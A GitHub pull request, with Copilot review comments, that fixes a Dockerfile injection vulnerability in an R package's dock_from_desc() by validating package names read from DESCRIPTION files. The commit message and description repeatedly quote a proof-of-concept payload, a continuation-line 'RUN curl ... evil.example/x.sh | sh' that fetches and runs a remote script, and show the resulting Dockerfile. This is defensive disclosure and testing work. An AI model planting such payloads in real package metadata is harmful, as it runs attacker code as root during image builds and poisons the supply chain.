fix(security): validate the package name read from the DESCRIPTION#113
Conversation
|
/copilot review |
0dab5d4 to
4df39e8
Compare
|
Force-pushed |
|
/copilot review |
There was a problem hiding this comment.
Pull request overview
This PR addresses a high-severity Dockerfile directive-injection vulnerability in dock_from_desc() by validating the Package field (and dependency package names) read from an untrusted DESCRIPTION, preventing newline/continuation-line payloads from being interpolated into generated Dockerfile directives.
Changes:
- Added
.validate_pkg_name()/.validate_pkg_names()enforcing CRAN package-name grammar and used them early indock_from_desc(). - Reused the validated package name for the tarball COPY source, cleanup glob, and user-facing “tar.gz created” message.
- Added regression tests covering continuation-line injection via
Package:andImports:; documented the fix inNEWS.md.
Reviewed changes
Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
R/dock_from_desc.R |
Reads/validates package/dependency names up front and reuses the validated package name in Dockerfile generation and tarball cleanup. |
R/utils.R |
Adds internal validators for DESCRIPTION package name(s) using CRAN grammar. |
tests/testthat/test-dock_from_desc.R |
Adds red/green tests to ensure crafted continuation-line payloads are rejected. |
NEWS.md |
Documents the security fix under the 0.3.0 Security section. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| if (update_tar_gz) { | ||
| old_version <- list.files( | ||
| pattern = sprintf("%s_.+.tar.gz", read.dcf(path)[1]), | ||
| pattern = sprintf("%s_.+.tar.gz", pkg_name), |
| # tar.gz-cleanup glob below for `build_from_source = FALSE`; validate | ||
| # it up front so a crafted `Package:` field cannot inject an extra | ||
| # Dockerfile directive. | ||
| pkg_name <- read.dcf(path)[1] |
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:
1. `build_from_source = FALSE`: the `Package:` field goes into the
`COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
`Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
(`desc::desc_get_deps(path)$package`) goes into a generated
`remotes::install_version("<name>", ...)` install RUN.
`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as
Package: app
RUN curl -s https://evil.example/x.sh | sh #
or
Imports:
evilpkg
RUN curl -s https://evil.example/x.sh | sh #
yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.
Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.
Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
instead of positionally (`read.dcf(path)[1]`): DCF field order is
not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
(`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
`sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
the CRAN grammar, e.g. `R.utils`) was being treated as a regex
wildcard and could `file.remove()` a sibling package's tarball
(`RZutils_*.tar.gz`).
Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
4df39e8 to
865c8de
Compare
|
Force-pushed
(copilot-feedback also factorized both into |
|
/copilot review |
Security fix — HIGH severity
Found by an internal full-codebase security audit during 0.3.0 CRAN prep. Same class as #112, on the
dock_from_desc()side.The bug
dock_from_desc(build_from_source = FALSE)interpolates the package name from theDESCRIPTIONinto the generatedCOPYdirective:read.dcf()joins DCF continuation lines with\n. So aDESCRIPTIONlike:makes
read.dcf(path)[1]return"app\nRUN curl -s https://evil.example/x.sh | sh #", andglue("COPY {from} {to}")then yields two Dockerfile lines:docker buildexecutes the injectedRUN ... | shas root in the build container — access to build secrets, mounted SSH keys, supply-chain poisoning of the produced image. The trailing#_*.tar.gz /app.tar.gzis a shell comment. TheDESCRIPTIONis a plausible attacker artifact (received from a colleague, vendored, a CI cache, a cloned tarball). The same unvalidated field also feeds thelist.files()cleanup glob (sprintf("%s_.+.tar.gz", read.dcf(path)[1])) — secondary, lower impact.Verified empirically: a crafted
DESCRIPTIONproduces exactly the two-line Dockerfile above.The fix
Add
.validate_pkg_name()enforcing the CRAN package-name grammar^[a-zA-Z][a-zA-Z0-9.]*$(letters, digits and dots only, starting with a letter — excludes whitespace, newlines and every shell/Dockerfile metacharacter), and call it on the package name atdock_from_desc()entry. The validated value is read once and reused for theCOPYdirective, the cleanup glob, and the "tar.gz created" message.Test (red-first)
tests/testthat/test-dock_from_desc.R: aDESCRIPTIONwhosePackage:field carries a continuation-lineRUNpayload must raise the package-name validation error rather than reaching the Dockerfile.COPYline as"COPY app\nRUN curl ... #_*.tar.gz /app.tar.gz"..validate_pkg_name()raises; benignDESCRIPTIONstill producesCOPY <pkg>_*.tar.gz /app.tar.gz.Full test suite: 0 failures (3 pre-existing warnings only — 2 deliberate "warns when path missing" tests + an rlang lifecycle deprecation from a dependency).
R CMD check: 0/0/0 (one transient "unable to verify current time" host NOTE, unrelated).Test plan
DESCRIPTIONregression passes.devtools::test(): 0 failures.R CMD check: expecting 0/0/0 (running).pr-revieweragent.dock_from_renv()fix (both: a craftedrenv.lock/DESCRIPTIONcould execute commands atdocker buildtime; both fixed in 0.3.0, no published version carried the gap).NEWS
Added under
## SecurityinNEWS.md(0.3.0).